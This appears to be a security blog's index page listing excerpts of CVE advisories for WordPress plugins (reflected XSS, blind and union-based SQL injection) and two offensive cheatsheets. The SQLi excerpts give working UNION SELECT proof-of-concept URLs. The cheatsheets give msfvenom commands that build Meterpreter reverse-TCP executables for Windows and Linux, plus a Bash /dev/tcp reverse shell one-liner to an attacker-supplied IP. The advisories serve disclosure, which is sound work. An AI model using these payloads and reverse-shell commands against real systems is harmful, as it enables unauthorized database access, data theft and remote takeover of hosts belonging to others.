Exploits

CVE-2017-9419: WordPress WP Custom Fields Search v.0.3.28 Reflected Cross-Site Scripting (XSS)

Identification Date: 11/06/2017 Vendor Homepage: http://www.webhammer.co.uk/wordpress#tab-wp-custom-fields-search Software Link: http://wordpress.org/plugins/wp-custom-fields-search/   Description This version of the WP Custom Fields Search plug-in is vulnerable to a Reflected Cross-Site Scripting vulnerability in the “cs-all-0” parameter due to the lack of proper input handling of the user’s data. An attacker can execute arbitrary JavaScript using a specially crafted URL. Thus, when the victim clicks…

Continue Reading

Exploits

CVE-2017-9429: Event List Version v.0.7.8 Blind Based SQL Injection (SQLi)

Identification Date: 04/06/2017 Vendor Homepage: https://profiles.wordpress.org/mibuthu Software Link: https://wordpress.org/plugins/event-list/ An authenticated user can can exploit this vulnerability by editing an event. Each event has an id parameter which is not properly sanitized. An attacker cans exploit the vulnerable parameter and execute arbitrary SQL queries using blind based SQL injection. Proof of Concept In order to replay the attack, use the…

Continue Reading

Exploits

CVE-2017-9603: WordPress WP Jobs v.1.4 SQL Injection (SQLi)

Identification Date: 11/06/2017 Vendor Homepage: http://www.intensewp.com/ Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/ Description SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter. Proof of Concept In order to replay the attack, use the link below. http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL– comment The results of the SQL injection are…

Continue Reading

Exploits

CVE-2017-9418: WP-Testimonials WordPress Plugin v.3.4.1 Union Based SQL Injection (SQLi)

Identification Date: 02/06/2017 Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/ Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/   Description SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter. Proof of Concept A Proof of Concept code is provided below. http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL– comment The results of the SQL injection are being reflected in…

Continue Reading

Cheatsheets

Cheatsheet: Metasploit Payloads

Windows You can use the following command in order to create an EXE file for a Windows machine. msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f exe > shell.exe Linux In order to gain access to a Linux host, an ELF file must be created. You can use the following line for that. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port]…

Continue Reading

Cheatsheets

Cheatsheet: Reverse Shells

Bash When we don’t have any other third party tool to get a reverse shell back, we can always redirect the Bash into our host using the following command. bash -i >& /dev/tcp/[Your IP]/[Your Port] 0>&1 Python When we want to get a reverse shell on Linux, we can do it by abusing the interpreters which come with the Operating…

Continue Reading

Exploits

CVE-2017-9420: WordPress Spiffy Calendar v.3.2.0 Reflected Cross-Site Scripting (XSS)

Identification Date: 02/06/2017 Vendor Homepage: http://spiffycalendar.sunnythemes.com/ Software Link: https://wordpress.org/plugins/spiffy-calendar   Description This version of the Spiffy Calendar plug-in is vulnerable to a Reflected Cross-Site Scripting vulnerability in the “yr” parameter due to the lack of proper input handling of the user’s data. An attacker can execute arbitrary JavaScript using a specially crafted URL. Thus, when the victim clicks on the…

Continue Reading